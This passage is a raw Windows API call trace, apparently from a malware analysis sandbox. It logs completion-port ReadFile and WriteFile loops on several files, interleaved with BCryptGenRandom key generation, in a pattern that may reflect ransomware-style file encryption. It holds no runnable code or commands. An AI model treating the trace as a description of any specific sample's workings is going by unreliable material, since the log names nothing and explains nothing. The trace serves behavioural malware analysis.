lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0185.927] CloseHandle (hObject=0x330) returned 1 [0185.927] free (_Block=0x3d70450) [0185.927] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0185.929] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x136b, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0185.933] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0185.933] CloseHandle (hObject=0x2a4) returned 1 [0185.933] free (_Block=0x1ff1e60) [0185.933] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0187.471] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0187.473] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0187.473] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0187.473] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0187.473] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0187.473] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0187.473] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0187.473] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0187.473] free (_Block=0x3e305b8) [0187.474] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0187.474] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0187.474] free (_Block=0x1fa91d0) [0187.474] free (_Block=0x1fa2ed8) [0187.474] free (_Block=0x1fa90b8) [0187.474] WriteFile (in: hFile=0x330, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0187.476] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0187.486] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0187.486] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0187.486] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0187.486] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0187.487] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0187.487] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0187.487] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0187.487] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0187.487] free (_Block=0x3e305b8) [0187.487] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0187.487] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0187.488] free (_Block=0x1fa91d0) [0187.488] free (_Block=0x1fa2ed8) [0187.488] free (_Block=0x1fa90b8) [0187.488] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0187.488] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0187.493] WriteFile (in: hFile=0x330, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0187.494] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0187.501] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0187.501] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0187.501] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0187.501] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0187.502] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0187.502] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0187.503] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0187.503] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0187.503] free (_Block=0x3e305b8) [0187.503] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0187.503] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0187.504] free (_Block=0x1fa91d0) [0187.504] free (_Block=0x1fa2ed8) [0187.504] free (_Block=0x1fa90b8) [0187.504] WriteFile (in: hFile=0x338, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0187.504] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0187.517] CloseHandle (hObject=0x170) returned 1 [0187.517] free (_Block=0x3d70450) [0187.517] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0187.525] WriteFile (in: hFile=0x338, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0187.526] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0187.533] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0187.533] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0187.533] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0187.533] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0187.534] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0187.534] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0187.534] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0187.534] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0187.534] free (_Block=0x3e305b8) [0187.534] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0187.534] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0187.535] free (_Block=0x1fa91d0) [0187.535] free (_Block=0x1fa2ed8) [0187.535] free (_Block=0x1fa90b8) [0187.535] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0187.536] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0187.547] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x10f70, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0187.547] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0187.553] ReadFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0xc278, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0187.560] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0187.570] CloseHandle (hObject=0x338) returned 1 [0187.570] free (_Block=0x3f70048) [0187.570] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0187.577] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x100a8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0187.584] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0187.587] CloseHandle (hObject=0x170) returned 1 [0187.588] free (_Block=0x3d70450) [0187.588] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0190.190] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x105f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0190.195] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0190.197] CloseHandle (hObject=0x2a4) returned 1 [0190.198] free (_Block=0x3df0008) [0190.198] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0190.200] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0190.201] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0190.205] CloseHandle (hObject=0x330) returned 1 [0190.205] free (_Block=0x1ff1e60) [0190.205] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0190.220] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3becb, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0190.227] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0190.236] CloseHandle (hObject=0x330) returned 1 [0190.236] free (_Block=0x3df0008) [0190.236] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0190.253] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x146a7, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0190.256] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0190.257] CloseHandle (hObject=0x330) returned 1 [0190.257] free (_Block=0x3df0008) [0190.257] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0190.272] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x13af1, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0190.275] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0190.276] CloseHandle (hObject=0x330) returned 1 [0190.276] free (_Block=0x3df0008) [0190.276] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0190.290] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1583a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0190.293] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0190.295] CloseHandle (hObject=0x330) returned 1 [0190.295] free (_Block=0x3df0008) [0190.295] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0190.309] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0190.326] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0190.329] CloseHandle (hObject=0x170) returned 1 [0190.329] free (_Block=0x3df0008) [0190.330] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0190.340] ReadFile (in: hFile=0x330, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x132b9, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0190.343] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0190.347] CloseHandle (hObject=0x330) returned 1 [0190.347] free (_Block=0x1ff1e60) [0190.347] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0190.356] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x16ef4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0190.359] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0190.360] CloseHandle (hObject=0x170) returned 1 [0190.360] free (_Block=0x3df0008) [0190.360] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0190.373] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1540b, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0190.379] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0190.659] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.659] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.659] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0190.659] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.660] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.660] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0190.660] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0190.660] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0190.660] free (_Block=0x3e305b8) [0190.660] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0190.660] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0190.661] free (_Block=0x1fa91d0) [0190.661] free (_Block=0x1fa2ed8) [0190.661] free (_Block=0x1fa90b8) [0190.661] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0190.663] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0190.673] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0xd160, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0190.674] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0190.681] ReadFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0190.695] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0190.712] CloseHandle (hObject=0x3cc) returned 1 [0190.712] free (_Block=0x3f70048) [0190.712] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0190.721] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x124a0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0190.731] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0190.741] CloseHandle (hObject=0x2a4) returned 1 [0190.741] free (_Block=0x3d70450) [0190.742] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0190.748] WriteFile (in: hFile=0x3cc, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x10d90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0190.748] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0193.480] CloseHandle (hObject=0x338) returned 1 [0193.480] free (_Block=0x1ff1e60) [0193.480] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0193.488] CloseHandle (hObject=0x330) returned 1 [0193.488] free (_Block=0x3d70450) [0193.488] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0193.497] CloseHandle (hObject=0x3cc) returned 1 [0193.497] free (_Block=0x3f70048) [0193.497] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0193.507] CloseHandle (hObject=0x308) returned 1 [0193.507] free (_Block=0x3e70008) 